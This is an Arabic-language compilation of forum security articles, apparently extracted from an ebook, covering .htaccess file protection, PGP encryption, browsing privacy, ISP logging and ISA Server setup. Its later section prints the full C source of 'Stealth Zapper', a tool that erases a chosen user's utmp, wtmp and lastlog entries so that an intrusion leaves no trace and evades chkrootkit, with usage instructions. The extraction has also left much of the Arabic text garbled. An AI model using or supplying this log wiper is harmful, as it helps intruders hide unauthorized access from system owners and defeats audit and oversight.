فالبرغم من ان الملف مخفي اال, یجب علینا ان نحمیه جیدا قد عرفنا االن ان لهذا الملف اهمیه كبیره ف .. انه غیر سالم من ان یكون السرفر نفسه غیر مؤمن او انه هناك تصریح خطأ

-: لذلك سوف نمنع عرض هذا الملف عن طریق اضافة ما یأتي

> htaccess.Files < deny,order allow

deny from all > /Files<

. 403errorفاذا حاول احد عرض الملف سوف یظهر له

208

جعل الصفحات تظهر بامتداد اخر * -- --- --- -- --- -- --- -- --- -- --- ---

. مثال txt. و لكنه ذو امتداد html.ویمكن باستخدام هذه الخاصیة عمل ملف یظهر كأن امتداده -:باضاف السطر التالي

plain html/AddType text -:ویمكنك رؤیة كافى التغیرات التي یمكنك عملها في هذا الملف

txt.MIME/books/net.pharaonics.www://http

209

أساسیات التشفیر

ــر<>ــد<> الــ:للكاتب

PGP الموضوع راح أوضح لكم كل شي عن التشفیر وماھي انشاء اهللا بھذ !وكیف تعمل ؟ بكتبه بعد عدة قراءات قمت بھا عن علم التشفیر وھذا الموضوع

etc .ملفاتك المشفرة والطرق الي يقدر الشخص انه يقرى Paranoid تكلم عن / DJ Kingوأظن األخ Paranoid أو Hacker كل

يھتم بالتشفیر ويستخدمه لیمنع: Hackerان كل شخص مثلوالي اقوله اآلخرين أو أي شخص كان من قراءة ملفاته وانشاء اهللا ابسط الفكرة في كیفیة

... التشفیر كسر

!! التشفیر وكیف يعمليستخدم قديما والحین نشاھده في كل مكان لنفرض انك طبعا التشفیر كان

كومبیوتر اكید مع ملفات مشفرة او ھازشفت مثال فلم تجسس راح تالقي جالمخترق ويوشوفون جھازه راح تالقي بعد مايقضبون على Hackers فلم عن

الواقعیة لیس يالقون اغلب الملفات مشفرة وھذا مايحدث اآلن وھو على وجه ! فقط في األفالم

يعني نص Plain text مصطلح تقدر تقراه يطلقون علیهtxt .لما يكون عندك ملفيصیر غیر قابل صافي او عادي لكن لما تستخدم التشفیر وتشفر الملف راح

قابل يعني النص المشفر الغیر Cipher text للقراءة وھذا يطلق علیه مصطلح ... للقراءة

:وھذا مثالPlaintext>==Descryption>==Ciphertext>==Encryption>==Plain text :حیث/ ه من التشفیر يوضح لما تشفر ملف وتفك المثال ھذا

= Plain text العادي النص = Encryption تشفیر النص = Cipher text نص مشفر = Descryption تشفیر النص المشفر فك = Plain text عودة الملف إلى نص عادي

210

PGP .... @علم التشفیر وھذا . الرياضیات لتشفیر وفك تشفیر البیانات علم التشفیر ھو علم يستخدم

حتى مع شبكة اإلنترنت الغیر آمنة العلم يفیدك في إنك تجعل من ملفاتك آمنة.

. حنا نحتاج لتعلم القوي منه وأكید. علم التشفیر احیانا يكون قوي او ضعیف

Encryption Program ) Pretty Goog Privacy(PGP : يقةھو أفضل برنامج تشفیر لتشفیر ملفاتك وھو يعمل بھذه الطر PGP إن

على ضغط الملف وھذا يساعد PGP تعمل PGP تشفر ملف ما بواسطة عندما تقلیل الحجم-2 التشفیر -1في أمرين مساحة القرص يعني يفیدك

يعمل Session Key جلسة ھذا أي مفتاح Session Keyوھي تنشأ مايعرف بالـ . الملف خاصة لتشفیر) لوغاريتم(بشكل آمن جدا وذو شفرة قاعدة أو

PGP يسألك عن( pass phrase ولیس عن) العبارة التي وضعتھا password

وھذا أكثر أمان ضد المھاجمین الذين يستخدمون القوامیس في استخراج عندما يقوم الشخص باستخدام جمیع الحروف في قاموس للحصول . الباسوورد

Password علىكامل بالحروف الكبیرة يمكن ان تدخل عبارة بال pass phrase تستخدم ولما

.... 9 إلى 0األعداد من والصغیر وايضا

: الطرق لكسر التشفیرتم كتابتھا بواسطة أشخاص الي يبغون ملفاتھم مشفرة من قبل PGP أكید إن

. أخرى ويريدون الخصوصیة والسرية التامة أشخاصن لما أشخاص كثیرون دون علمك لك يمكن قرائته من قبل mail - E لما ترسل . فقط الشخص للذي الرسالة الخاصة به يقرأھا PGP تستخدم

والتشفیر أيضا تريد أن تعرف إذا كان PGP ألحین إنت تعلمت أھم األشیاء حول

!! باإلمكان من كسر ھذا النوع من التشفیر أم ال األجھزة الموجودة بالعالم لفك تشفیر رسالة في الحقیقة لو استخدمت جمیع

PGP ھھھھھھھھھھھھھھھھھخخخخ يعني املك ملیون مرة12بغالھا صغیرة ياألنواع والأحد يقدر لھذا يعد أفضل PGP ھذا مايمیز التشفیر من نوع% 1

. يكسره

211

PASS PHRASE ...عبارة التصريح

الملفات قوي جدا لكن ھل من الممكن فتح PGP أكید إن نوع التشفیر !المشفرة بواسطته ؟

التصريح والتي ھي ن الشخص غبي لدرجة أن يضع جمیلةبشرط واحد إذا كاpass phrase عبارة سھلة نوعا ما

... أو اسمه الشخصي وھكذا 123456 أو123456789: مثل وصل الملف يقدر يفك تشفیر أو أن يقوم بتخزينھا في ملف نصي واكید اذا احد

ان صعب جدا ماك طويلة كل pass الملفات بسھولة وطبعا كل ماكانت عبارة . العثور علیھا

الباسوورد حتى انه إليجادForcing - Bruteوبعضھم يحاول استخدام تقنیة ! العشوائیة ويضع فیه العديد من الكلمات Bruteممكن يغیر القاموس الخاص بالـ

: حاول تخلي العبارة الخاصة فیك اصعب من كذا555hhfFFfFuFdghdHGdGDgdgH454254HeYiWiLl

صعبة جدا ذات حروف كبیرة وصغیرة حتى تتأكد من إنك تضع عبارةوالمفروض . تضمن عدم التفكیر في كسر الملف المشفر

؟!! بعد استخدام التشفیر TXT التقم بحذف ملفاتولكن TXT الزم تحذف ملفات PGP أكید لما تنتھو من تشفیر الملفات بواسطة

إرجاعھا بمجرد استخدامه في الحقیقة الملفات التنحذف وبإمكان أي شخص حتى لو كتبت الجملة بواسطة المحرر الدفتر لن ينحذف Disk Recovery برنامجوجوده في مكان ما في جھازك لذلك ھنالك أداة خاصة البد من txt ملف

تسمى PGPبالـPGP Secure Wipe

ھذي اإلداة البسیطة تكمل عملیات حذف الملفات المحذوفة من جھازك وھكذا . فقط لديك الملف المشفر ف يصلحسو

Virus & Trojan !ماعالقة فھو يقوم بحفظ كل Key logger عالقة وثیقة فاحذر ان يحتوي جھازك على

ماكتب على لوحة المفاتیح وإرسالھا للمھاجم او المخترق وبذلك سوف يقوم !! السرية بمعرف العبارة

لنوع من العباراتوأيضا ھنالك فیروسات خاصة صممت لتسرق ھذا ا

212

-------------------------------------------------------------------------------------- يعتبر آمن ألبعد الحدود واليمكن PGP أقولكم إن التشفیر بواسطة وألحین

المستخدم اليؤمن علیه او يضع عبارات سھلة جدا او يحتوي كسره إال إذا كان ... مفتاح التسجیل س وتروجان اوجھازه على فیرو

التشفیر لذلك إذا أمنت نفسك جیدا لن واليوجد أي شخص يستطیع كسر ھذا>---............))PGP

freeware/versions/pgp/products/org.pgpi.www://http --------------------------------------------------------------------------------------

213

ماذا تعرف المواقع التى تزوره عنك؟

عندما تتجول في حواري إنترنت، فالموقع الذي تمر به، یفتح سجال خاصا بك، . تترك أثار أقدامك في كل مكان تزوره رقم االبي ، نوع الكمبیوتر والمتصفح الذي تستخدمه، وعنوانیتضمن عنوان الموقع الذي جئت منه

ویمكن تحت ظروف معینة، أن یتمكن . الدائم، أو المتغیر، للكمبیوتر الذي تتصل منه ویقول بعض الخبراء، . الموقع من الحصول على عنوان بریدك اإللكتروني، واسمك الحقیقي

ریب، أو أكتیف إكس، سرقة عنوان بریدك أنه یمكن باستخدام بریمجات جافا، أو جافا سیك اإللكتروني، وبعض المعلومات األخرى عنك، على الرغم من أن هذا العمل غیر قانوني

، من خالل األوامر .3.2تستطیع شل عمل جافا في إكسبلورر

View

ثم

Options ثم

Advanced،

وإزالة عالمتي االختیار من مربعي

من خالل األوامر 3.0وفي نافیجیتور

Enable Java JIT compiler

enable Java Logging.

Options.

ثم Network Preferences

ثم

214

Languages

وإزالة عالمتي االختیار من مربعي

Enable Javaو ،enable JavaScript

قع أسهل طریقة لمعرفة ما تسجله المواقع التي تزورها عنك، عادة، هي التوجه إلى مو

)analyze/net.consumer.www(

.واالنتظار قلیال، قبل أن یكتشف هذا الموقع المعلومات، ویعرضها أمامك على الشاشة

. وتقدم أنت، معلوماتك الشخصیة، عندما تمأل قسیمة االشتراك في خدمات أحد المواقع یسرب هذه ، ولن"محترم"وننصحك في هذه الحالة، بالتأكد أوال، من أن هذا الموقع

..المعلومات إلى جهات أخرى، قبل أن تقدم له هذه المعلومات

تضع معظم مواقع ویب، عندما تزورها، ملفا صغیرا على القرص الصلب لكمبیوترك، یسمى " كوكي")Cookie(

بهدف جمع بعض المعلومات عنك، وهو مفید أحیانا، خاصة إذا كان الموقع یتطلب منك ففي هذه الحالة لن تضطر في كل زیارة إلدخال تلك . ور تخولك بزیارتهإدخال كلمة مر

، الذي وضعه على قرصك "الكوكي"الكلمة، إذ سیتمكن الموقع من اكتشافها بنفسه عن طریق لكن، یرى الكثیر من المستخدمین في ذلك انتهاكا . الصلب، في الزیارة األولى

إذا كنت . تحركاتك ضمن الموقع" الكوكي"راقب لخصوصیاتهم أثناء التصفح، خاصة عندما ی على قرصك الصلب، بهدف جمع بعض المعلومات عنك، " كوكیز"ال ترغب أن یسجل اآلخرون

، "كوكي"فبإمكانك تجهیز المتصفح الذي تستخدمه، بحیث یطلب موافقتك، قبل أن یحفظ أي ). ting a CookieAccep، ثم Network Preferences، ثم Optionsعلى قرصك الصلب

واألفضل أن تستخدم برامج، مثل

تحلل رموز الكوكي، وتعلمك ما إذا كان مفیدا أم ال، ثم نصحك بقبوله أو حذفه، ، بناء .على ذلك التحلیل

تتمثل أكبر المخاطر التي قد تواجهها، في ما تكتبه ضمن المجموعات اإلخباریة إذ تدخل

).com.wsdejane.www(رسائلك ضمن أرشیف .قد تشارك،. سنة، أیضا20، حیث یمكن ألي شخص االطالع علیها، اآلن، وربما بعد

215

عندما تكون شابا في بعض المجموعات اإلخباریة غیر المناسبة، وتكتب آراء طائشة، لكن، علیك أن تعلم أن ما خطته یداك، قد یبقى إلى األبد، وربما یطلع علیه أحفادك، أو

!. وقد یستخدم یوما كسالح ضدك، فإنترنت ال تنسى!جهات أخرى أما ما تكتبه ضمن منتدیات الحوار والدردشة العربیة، فله وجهان متعارضان

وحتى إن . األول، هو أن معظم هذه المنتدیات، ال تحتفظ بما یكتب فیها لفترات طویلة

قیب ضمن األرشیف، احتفظت بها وأرشفتها، فإن معظمها ال یوفر أدوات بحث فعالة للتن .وهذا یعني أن احتمال اكتشافها على المدى البعید أقل

فلو طلبت أي جهة قانونیة . الوجه الثاني، هو أن الرقابة في المجتمعات العربیة أكبر

من المنتدى ومزود خدمات إنترنت، الكشف عن كاتب إحدى الرسائل، أو المشاركین في وسوف یعرف كاتبه، . إذا كان ما كتبه ال زال موجوداالدردشة، فسوف یتم ذلك بسهولة،

. حتى إن كان یستخدم اسما وعنوانا بریدیا زائفین

216

لحل كثیر من المشاكل االمنیة على الشبكة Isa شرح وظیفة

الشمالى: للكاتب

مع زيادة إستخدام شبكة االنترنت في الشبكات المحلیة سواء لربط الشبكات الزبائن أو نشر التطبیقات ، كان البد من وجود برنامج حماية أو وصول الفرعیة

االخطار المحتملة من االنترنت ، متكامل يمنع كل

ھو من البرامج Microsoft Internet Security and Acceleration ISA وبرنامجكثیر من المشاكل االمنیة المثالیة لذالك ، فھو يقدم ادوات وقدرة كبیرة لحل

الشبكة ، بكة وتحكم شبه كامل بكل منافذ الدخول والخروج منعلى الش وبإلضافة لذالك فھو يعمل كبروكسي للشبكة لوصلھا باالنترنت بطريقة سريعة

حیث يمثل مصدر للطلبات لكل زبائن الشبكة حیث يعرض الطلبات بطريقة الخادم بدل االنترنت ، ويكون بذاك اسرع من الوصول دينمیكیة من ذاكرة

مباشرة نترنت بصورةلال

كبیرة يعطي قیمة Microsoft Internet Security and Acceleration ISA خادمللشبكة وقدرة على التحكم لمن يطمعون في الوصول إلى نتائج أمن مرضیة ،

برنامج يعمل على كل الحجوم من الشبكات ، شبكة مكتب صغیر ، فرع فھو) مزودو خدمة اإلنترنت(ودو خدمات اإلنترنت االكترونیة ، مز شركة ، مواقع تجارة

. ويب وشركات إستضافة مواقع

والشبكة يمكن أن ينشر كبرنامج حماية يقوم مقام بوابة بین االنترنت ISA خادمالداخلیة مع سیاسات وصول متكاملة تجعل المدراء يتبعون منھج دقیق في

. حتوى خبیثوإعطاء ومنع الوصول غیر المخول وكشف كل م تدقیق

ISA تثبیت البرنامج

تثبیت البرنامج ھو في غاية السھولة لمن له خبرة بسیطة في التعامل معبرامج وتطبیقات مايكروسوفت ، فبعد أن تكون قد اشتريت النسخة الخاصة بك

المتطلبات الرئیسیة لتركیب الخادم على شبكتك ، ومن أھم علیك بتفحص : -ذالك مايلي

حد أدنى megahertz 300 - 2م بنتیو جھاز

217

Microsoft Windows 2000التالیة نظام التشغیل يجب أن يكون أحد النظم

Server 1مع Service Pack أو أعلىAdvanced 2000 Microsoft Windows , Server 1مع Service Pack 2000 أو, أو اعلى Microsoft Windows

Datacenter Server

MB 256 من الـmemory

MB 20 الحرة على القرص الصلب من المساحة

الداخلیة للوصول للشبكة2000كرت شبكة يكون متوافق مع الويندوز

NTFS مقطع يكون بنظام

وتريد تطبیق سیاسة األمن المتقدم يجب أن array إذا كنت ستركب البرنامج كـ ectory Active Dirالنشط تكون الشبكة وخادم الشبكة علیه الدلیل

نوعیة التثبیت

ISA تثبیت البرنامج وذالك بإختیار صفة خادم لنوعیة التثبیت أھمیة كبیرة في

والفرق بین الخادم المستقل والـ ، array ھل سیكون خادم مستقل ام سیكونarray ھو الـ array میدان في دلیل نشط يتم التعامل مع نظام الشبكة كـ

الخادم من قاعدة بیانات ذالك الدلیل ، وفيويأخذ كل بیانات المستخدمینال يتطلب وجود میدان وال دلیل نشط ، وإذا alone server - standالمستقل

على الجھاز وكنت تريد التثبیت يكون كـ ISA ھذه اول مرة تثبت فیھا خادم كانتarray علیك أوال ان تثبت فیجب ISA Server schema وھو برنامج صغیر يثبتواحدة فقط ولیس علیك تثبیته مرة أخرى حتى لو حذفت دلیل النشط مرةفي ال . مرة ثانیة من الشبكة واردت تثبیته ISA خادم

خادم( البرنامج ال تركب Active Directory فإذا كان لديك میدان مع دلیل نشط

) ISA إال كـ array وإن كان بإمكانك تثبیته كـ ،alone server - stand

لتثبیتخصائص ا

218

: -كما يلي يمكن التثبیت على ثالث أشكال وھي على التواليfirewall cache

integrated

يجمع كل ممیزات االثنین integrated أن نمط

التثبیت خطوة خطوة

array بتثبیت البرنامج كـ سنقوم

االقراص أدخل القرص الیزري للبرنامج في محرك

Install ISA Server ت البرنامج ، اضغط علىسیعمل القرص ويفتح نافذة تثبی تظھر لك شاشة الترحیب اكمل

الرقم ثم تابع ثم شاشة رقم تسجیل البرنامج أدخل I Agree شاشة االتفاقیة اضغط على

Full اختر Custom , Full , Typicalاختیار نوع التثبیت اضغط نعمalone - standأو array السؤال عن رغبتك في تثبیت البرنامج كـ

array اكتب اسم لھذا الـ

Use default policy settings األمن اختر من ھذه الشاشة اختر نوع إعدادت

خیرالخادم الذي تريد اختر الخیار اال ثم من الشاشة التالیة اختر شكل ونوع

219

IIS خادم من اجل80 و 8080يخبر برنامج التثبیت أن البرنامج سیعطل المنافذ ذة التالیة اختر مكان التثبیت اختر نفس المقطعمن الناف

ديكفي النافذة التالیة اكتب مجال العناوين ل

220

عن إنتھاء تبدأ عملیة التثبیت وسینتھي سريعا ، ثم تظھر لك نافذة تخبرك یتعملیة التثب

افتح البرنامج ستجد كثیر من االدوات التي تتحكم بھا

SA Iتمكین الوصول لألنترنت على خادم

غیر ممكن عند ISA يكون الوصول لألنترنت من خادم في كثیر من االحیانتأھیل بعض البروتوكوالت للعمل على التثبیت االول ولتمكین االتصال يجب

الصورة المرفقة بالمرفقات وفي HTTP و بروتوكول HTTPS الخادم مثل بروتوكول مالخاد كل البروتوكوالت المھمة التي يجب أن تعمل على

تأھیل البروتوكول

221

، من ھنا IP Packet Filters من ثم array ثم من على اسم الـ ISA افتح خادم

أن تمنع تمكن أي بروتوكول من الدخول أو الخروج وكذالك يمكن

create the IP Packet Filters من الخیارات التي تكون في الجھة الیمین اختر اختر اسم للعملیة ولیكن اسم معبر عنسیفتح لك معالج في النافذة االولي

البروتوكول المراد تأھیله ثم اكمل باقي النوافذ بالبروتوكول المناسب ورقم المنفذ

وقبل تأھیل أي بروتوكول راجع البروتوكوالت الموجودة من قبل حتى ال تتكرر

عملیة التأھیل مرتین لنفس البروتوكول

إلیھا بسھولة عند حدوث أي رجعوكذالك دون كل عملیة تقوم بھا حتى ت مشكلة في االتصال

222

ماذا یعرف عنك المزود؟

یظن بعض مستخدمي إنترنت، وخاصة المبتدئین منهم، أن ال أحد یستطیع اكتشاف ماذا المعلومات التي یقدمونها أثناء التسجیل .. المواقع التي یزورونها: یفعلون على إنترنت

الحوارات التي یشاركون فیها ضمن المنتدیات أو في غرف ..في بعض المواقع، أو الشراء الرسائل التي یكتبونها للمجموعات اإلخباریة الكلمات والعبارات التي .. الدردشة

.. الملفات التي یجلبونها.. ینقبون عنها باستخدام محركات البحث

برید إلكتروني ویعتقد بعض هؤالء أنه یكفي أن تدخل ساحات الحوار باسم مستعار وعنوان زائف، كي تخفي هویتك عن العالم بأجمعه

فأخوك األكبر ال ینام، ویسجل كل . كل هذه المعتقدات خرافات ال أساس لها من الصحة

!ومضیفوك فضولیون وقادرون على جمع الكثیر من المعلومات عنك.. حركاتك وسكناتك

نت، وهي إما مزود خدمات إنترنت لكن، من هو األخ األكبر؟ إنه الجهة التي تصلك بإنتر الرئیسي

)ISP(

الذي تشترك معه

أو كمبیوتر مؤسستك، إذا كانت تتصل بإنترنت عن طریق خط خاص مؤجر أما مضیفوك، فهم المواقع التي تزورها وأنت تبحر في عباب إنترنت

تخترق خصوصیتك في الشبكة من جهتین

اختراق یمكن أن یكون شامال مزودك بخدمة االتصال بإنترنت وهو

المواقع التي تزورها، ومنتدیات الحوار التي تشارك فیها، أیا كان نوعها، وهو اختراق جزئي، لكنه خطر، أحیان

ربما تسلل الخوف إلیك بعد قراءة السطور السابقة، لكن، تعال نتبین الصورة الواقعیة

لكل ذلك

ماذا یسجل مزود خدمات إنترنت عنك ؟ یمكن لمزود خدمات إنترنت، من الناحیة النظریة، أن یكتشف كل أفعالك عندما تتصل

223

بالشبكة، ویشمل ذلك، عناوین المواقع التي زرتها، ومتى كان ذلك، والصفحات التي اطلعت علیها، والملفات التي جلبتها، والكلمات التي بحثت عنها، والحوارات التي شاركت فیها،

وني الذي أرسلته واستقبلته، وفواتیر الشراء التي مألتها، والخدمات والبرید اإللكتر لكن، تختلف من الناحیة الفعلیة، كمیة المعلومات التي یجمعها مزود . التي اشتركت بها

فإذا لم یكن مزود . خدمات إنترنت عنك، باختالف التقنیات والبرمجیات التي یستخدمها ، وبرمجیات تحسس الحزم )سلم وتفلتر كل طلباتكتت(الخدمة یستخدم مزودات بروكسي

"packet sniffer) "فقد ال یسجل عنك، سوى بیاناتك )تحلل حركة المرور بتفصیل كبیر ، الخاص بالكمبیوتر المتصل، وتاریخ وزمن اتصالك بالشبكة، وانفصالك IPالشخصیة، ورقم

وى التفصیالت بالبرمجیات ، فترتبط مست"بروكسي"أما إذا كان اتصالك یمر عبر . عنها التي یستخدمها مزود الخدمة، والتي یمكن أن تصل في حدها األقصى، إلى المستوى النظري،

وینطبق ما ذكرناه، في حال كان اتصالك یتم عبر خط خاص مؤجر، . الذي أشرنا إلیه سابقا .للمؤسسة التي تعمل فیها

معظم مزودي خدمات إنترنت ال یطلعون على أما األخبار الطیبة لمستخدمي إنترنت، فهي أن

السجالت، ما لم یطلب منهم ذلك بأمر رسمي من الجهات المسؤولة عن تطبیق القانون، وهو تبقى إمكانیة التطفل على أفعال المشتركین قائمة، لكنها تتطلب . أمر نادر الحدوث

مات إنترنت غیر مستعدین جهودا كبیرة، ووقتا طویال، باإلضافة إلى أن معظم مزودي خد وال یهتمون، لهذا السبب، بمراقبة . للمخاطرة بسریة المشتركین، وخسارة بعضهم

المشتركین، بداللة أنهم یرسلون رسائل البرید الصادر، بأسرع ما یمكن، لتحریر ویحذفون البرید اإللكتروني الوارد، . المساحات التي یشغلها على األقراص الصلبة

..د أن یجلبه مستخدم إنترنت إلى كمبیوتره الخاصبسرعة، بع

قد یختلف األمر بالنسبة للعاملین في المؤسسات الكبیرة، التي تتصل بإنترنت عبر خطوط فمن مصلحة مدراء هذه المؤسسات، فرض رقابة على . خاصة مؤجرة، ویتوفر لدیها مزود داخلي

اقع الریاضة، والترفیه، والدردشة، الموظفین، لمنعهم من تبدید وقت العمل في تصفح مو وربما یراقبون بریدهم اإللكتروني أیضا، للتأكد من أنهم ال یعملون . على شبكة ویب

فإذا كنت واحدا من هؤالء الموظفین، فحاذر في . لحساب جهة أخرى، أو لحسابهم الخاص ! ..رفاتككیفیة استخدامك للشبكة، فربما یوجد من یراقب تص

224

ف رقم االبي نمبر؟ماذا یكش

عندما یزور شخص موقعا على الشبكة، یسجل الموقع رقم االبي العائد للكمبیوتر الذي وعند إرسال رسالة إلكترونیة، یمكن لمتسلم الرسالة معرفة عنوان االبي ، . اتصل به

فإذا كان یستخدم برنامج مثال االوتلوك، فیكفي أن ینقر . للكمبیوتر المرسل، أیضا على اوبشن بعد أن یفتح الرسالة، لیطلع على عنوان االبي لكن، هل یحدد عنوان

الكمبیوتر المتصل، بدقة؟ إذا كان الكمبیوتر المتصل، ینتمي إلى شبكة مرتبطة بخط خاص مؤجر كما هو حال العدید من شبكات المؤسسات المتوسطة والكبیرة، فسوف یكشف عنوان عن

.الكمبیوتر المتصلاسم تلك المؤسسة، ورقم

أما إذا كان الكمبیوتر یتصل عن طریق طلب رقم هاتف عادي فال یكفي رقم االبي ، لتحدید ، إذا سیكشف القسمان األول والثاني من )أو التي بعث برسالة(الجهة المتصلة بالموقع

فیما الرقم، بدءا من الیسار، عن اسم مزود خدمات إنترنت، الذي یشترك لدیه المتصل، یحدد القسمان الثالث والرابع، رقم مجموعة الكمبیوترات، والكمبیوتر المتصل لدى مزود

وقد یحمل، لهذا . الخدمة، على التوالي، ولیس الكمبیوتر الذي أجرى االتصال األولي السبب، العدید من المتصلین عن طریق مزود خدمة واحد، عناوین متطابقة، إذا جرى

في هذه الحالة، ) أو مرسل الرسالة(كیف یمكن اكتشاف المتصل . مختلفةاالتصال في أوقات إن ارتكب مخالفة قانونیة؟

)ISP(یمكن ذلك عن طریق مزود خدمة إنترنت الذي تحتفظ كمبیوتراته، بسجالت عن كافة االتصاالت، تضم حقال لرقم ، وحقلین لكل من

ي أن تزوده الجهة المتضررة بقیمة ویكف. تاریخ وزمن االتصال وحقال السم المشترك ویمكنه بالتعاون . ، كي یكتشف اسم المشترك)تكون مسجلة لدیها(الحقول الثالثة األولى

لكن هذه اإلجراءات . مع مؤسسة الهاتف، الوصول إلى الرقم الذي تم عن طریقه االتصال . تتطلب تدخال من قبل الجهات الرسمیة المشرفة على تطبیق القانون

225

StealthZapper لمسح تحركاتك من على السیرفر..

HeLL RaiSeR:للكاتب ..السالم علیكم

..انت تحدده ھو مسح و حذف اللوج من على السیرفر لشخص.. عمل ھالكود

:كود// Stealth Zapper 1.0 by Topo[LB] // // Erases the utmp,wtmp and lastlog entries for a specific user. // Unlinke classic zappers, it does not leave "holes" on wtmp and utmp files. // Now, it won't be possible to detect that this zapper have ever been ran on the system // => chkrootkit and antizap should not detect anything. // // It also detects the traces left in the utmp/wtmp logs by other classic zappers. // // Tested under GNU/Linux // // Please, use it for educational purposses only. #include <stdio.h> #include <time.h> #include <string.h> #include <utmp.h> #include <getopt.h> #include <lastlog.h> #include <pwd.h> #include <unistd.h> #include <sys/types.h> #define VERSION "1.0" short verbose=0; short erasezaps=0; short analyze=0; void Version(char *program){ printf("\n%s\n\n",VERSION); exit (1); } void Usage(char *program){

226

printf ("Usage: %s [-u user | -s] [-h] [-v] [-V]\n\n", program); printf(" -u <user> Erases the log entries for this user.\n"); printf(" -s Removes traces of previously ran zappers\n"); printf(" -a Analyze log files searching zapper traces\n"); printf(" -v: be verbose\n"); printf(" -V: prints program version and exits\n"); printf(" -h: prints this help ;)\n\n"); exit(0); } void Exiterror(char *error){ printf ("\n ERROR: %s \n\n",error); printf ("Take a look at the help using -h\n\n"); exit(0); } void Banner(void){ printf("\nStealth Zapper 1.0 by Topo[LB]\n\n"); } void CleanUTMP(char *username, char *filename){ FILE *file; FILE *file2; long finallenght=0; //long lastposition=0; struct utmp r_uwtmp; struct utmp r_uwtmp_zero; int i=0; short entryfound=0; long timebefore; long timeafter; short haveprint=0; int deletedentries=0; int totaldeletedentries=0; char asctimebefore[256]; char asctimeafter[256]; bzero(&r_uwtmp_zero, sizeof(r_uwtmp_zero)); if(!(file=fopen(filename, "r"))){ printf(" Error opening file %s\n\n", filename); return; }

227

if (!analyze){

if(!(file2=fopen(filename, "r+"))){

printf(" Error opening file %s\n\n", filename); return; } } if (analyze){ timebefore=0; while(fread((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file) > 0) { if(!bcmp(&r_uwtmp,&r_uwtmp_zero,sizeof(r_uwtmp))){ haveprint=1; totaldeletedentries++; deletedentries++; }else { if (!haveprint) timebefore=r_uwtmp.ut_time; else { timeafter=r_uwtmp.ut_time; strcpy(asctimebefore,ctime( (time_t *)&timebefore)); strcpy(asctimeafter,ctime( (time_t *)&timeafter)); printf (" [!!!] Detected %u deleted entries between %s and %s\n",deletedentries, asctimebefore, asctimeafter); fflush(stdout); deletedentries=0; haveprint=0; timebefore=r_uwtmp.ut_time; } } } if (haveprint) { strcpy(asctimebefore,ctime( (time_t *)&timebefore)); strcpy(asctimeafter,ctime( (time_t *)&timeafter)); printf (" [!!!] Detected %u deleted entries between %s and %s\n",deletedentries, asctimebefore, asctimeafter); fflush(stdout); } if (!totaldeletedentries) printf ("\n [INFO] No zapper found :)\n\n"); else printf ("\n [!!!] ZAPPER FOUND. %d entries were deleted by someone!\n\n",totaldeletedentries); }

228

if (!erasezaps && !analyze) while(fread((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file) > 0) {

if(!strcmp(r_uwtmp.ut_name, username)){ if (verbose) printf("Entry detected for %s on %s. Deleting it!\n",username, ctime( (time_t *) &r_uwtmp.ut_time)); totaldeletedentries++; entryfound=1; } else { if (entryfound) fwrite((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file2); else fseek(file2, sizeof(r_uwtmp), SEEK_CUR); } } if (erasezaps && !analyze) while(fread((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file) > 0) { if(!bcmp(&r_uwtmp, &r_uwtmp_zero, sizeof(r_uwtmp))){ if (verbose) printf("Erased entry detected!\n"); totaldeletedentries++; entryfound=1; } else { if (entryfound) fwrite((char *)&r_uwtmp, sizeof(r_uwtmp), 1, file2); else fseek(file2, sizeof(r_uwtmp), SEEK_CUR); } } fclose(file); if (!analyze){ finallenght=ftell(file2); fclose(file2); if (entryfound) if (truncate(filename,finallenght)){ printf("WARNING! truncate() error"); } } if (!totaldeletedentries){ if (!analyze && !erasezaps) printf (" User %s not found!\n\n",username); if (!analyze) printf (" NO zap entries detected. 0 entries cleaned\n\n"); } else{ if (!analyze && !erasezaps) printf (" %d entries cleaned for user %s!\n\n",totaldeletedentries,username); if (!analyze) printf (" %d entries cleaned\n\n",totaldeletedentries);

229

} }

void CleanLastlog(char *username, char *filename) { FILE *file; struct passwd *p_passwd; struct lastlog r_lastlog; int i=0; if((file=fopen(filename,"r+"))==NULL){ printf(" Error opening file %s\n\n", filename); return; } if ((p_passwd=getpwnam(username))==NULL){ printf (" User %s not found!\n\n",username); return; } fseek(file, (long)(p_passwd->pw_uid*sizeof(r_lastlog)),SEEK_SET); bzero((char *)&r_lastlog, sizeof(r_lastlog)); fwrite((char *)&r_lastlog, sizeof(r_lastlog),1,file); fclose(file); printf("Lastlog file cleaned for user %s!\n\n",username); } int main(int argc, char *argv[]) { char username[UT_LINESIZE]=""; int i; Banner(); if (argc<2) Usage(argv[0]); while((i=getopt(argc, argv, "avVshu:")) != EOF) { switch(i) { case 'V': Version(argv[0]); break; case 'h': Usage(argv[0]);

230

break; case 'v': verbose=1; break;

case 's':

erasezaps=1; break; case 'a': analyze=1; break; case 'u': if (!optarg) Exiterror("If you use -u you must provide a username!"); if(strlen(optarg)>UT_LINESIZE){ printf("username is too long\n"); exit(0); } strcpy(username, optarg); break; default : Exiterror("Unknown parameter"); break; } } if (!erasezaps && !analyze && username[0]==0) Exiterror("You must use either -s or -u <user>"); printf(" UTMP Cleaning ...\n"); fflush(stdout); CleanUTMP(username, _PATH_UTMP); printf(" WTMP Cleaning ...\n"); fflush(stdout); CleanUTMP(username, _PATH_WTMP); if (!analyze && !erasezaps){ printf(" LASTLOG Cleaning ...\n"); fflush(stdout); CleanLastlog(username, _PATH_LASTLOG); } }

231

root ..الستخدامه يشترط انك تكون: مالحظة

:االستخدام بعد الكومبايل يكون كذا

:كودUsage: ./(name after compile) [-u user | -s] [-h] [-v] [-V] -u <user> Erases the log entries for this user. -s Removes traces of previously ran zappers -a Analyze log files searching zapper traces -v: be verbose -V: prints program version and exits -h: prints this help ;)

Log WipperS للمزيد من الــ الرابط زر ھذا

232

سترجاع المنتدى بعد اختراقه بالصورشرح طريقة ا

متلطم ضب :للكاتب



ھذا شرح لطريقة استرجاع المنتدى بعد اختراقه وايضا اذا حدثت يا اخوانيتقدر تحلھا من ھنا الن بعض االخوان اذا حدثوا النسخه عندك مشكله بالیوزرات

العام ھم مشاكل مع اسم المشرفتصیر مع

واذا كان الموضوع موجود مسبقا فزيادة الخیر خیرين

نبدا بسم اهللا

اول شي تدخل على لوحة تحكم الموقع

البیانات نفس الصوره اللي تحت نضغط على ايقونة قاعدة

